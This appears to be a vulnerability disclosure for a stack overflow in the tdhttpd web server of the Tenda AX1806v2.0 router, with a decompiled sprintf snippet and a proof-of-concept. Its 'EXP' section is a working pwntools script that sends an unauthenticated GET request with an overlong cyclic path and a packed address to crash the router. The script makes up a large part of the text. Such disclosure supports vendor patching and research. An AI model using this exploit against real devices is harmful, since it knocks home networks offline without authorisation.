Tenda AX1806v2.0栈溢出漏洞-en.md

Tenda Home Wireless Router AX1806v2.0 Stack Overflow Vulnerability POC

Manufacturer's official website

腾达(Tenda)官方网站

Affected device models

Dual-Band Gigabit Wi-Fi 6 Router AX1806v2.0

Affected firmware version

AX1806 升级软件 V1.0.0.1

Vulnerability type

[DoS] Unauthorized Denial of Service Attack

Vulnerability description

In the latest firmware of the AX1806 by Shenzhen Tenda Technology Co., Ltd., there exists an unauthorized denial of service (DoS) vulnerability. The web server in the firmware's file system does not properly restrict the length of certain fields when processing user requests, leading to a stack overflow vulnerability based on sprintf, which subsequently causes a denial of service attack.

Make your life simpler

[Video/Tenda AX1806v2.0栈溢出漏洞证明视频.mp4 at main · Swind1er/Video (github.com)](https://github.com/Swind1er/Video/blob/main/Tenda AX1806v2.0栈溢出漏洞证明视频.mp4)

Vulnerability analysis

Translated to English:

Located in the firmware file system, the web server program tdhttpd corresponds to RVA 0x0002018C in IDA, where the summarized key code snippet is as follows:

  Var = (const char *)webGetVar(a1, "HTTP_HOST", websHostUrl);
  sprintf(s, "https://%s%s", Var, *(const char **)(a1 + 0xA4));// The `sprintf` function does not limit the length of its third parameter, allowing attackers to pass excessively long data without authorization, causing a stack overflow and subsequently enabling a denial of service attack.
  sub_2A714(a1, s);
  return v5;

It can be observed that the program does not restrict the length of the string content at (a1 + 0xA4), while the buffer size s is limited. When the string at (a1 + 0xA4) (corresponding to the accessed path) is excessively long, it will cause a stack overflow, as detailed in the exploit.

EXP

from pwn import *

host = "192.168.0.1"#Please replace it with the IP address of the test router.
port = 80

request = (
    b"GET /aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaak1234"+p32(0x0003A71C)+b"HTTP/1.1\r\n"
    b"Host:"+bytes(host,encoding='utf-8')+b"\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
    b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
    b"Accept-Language: en-US,en;q=0.5\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Upgrade-Insecure-Requests: 1\r\n"
    b"Sec-Fetch-Dest: document\r\n"
    b"Sec-Fetch-Mode: navigate\r\n"
    b"Sec-Fetch-Site: none\r\n"
    b"Sec-Fetch-User: ?1\r\n"
    b"Te: trailers\r\n"
    b"Connection: close\r\n\r\n"
)

conn = remote(host, port)
conn.send(request)
response = conn.recvall()
conn.close()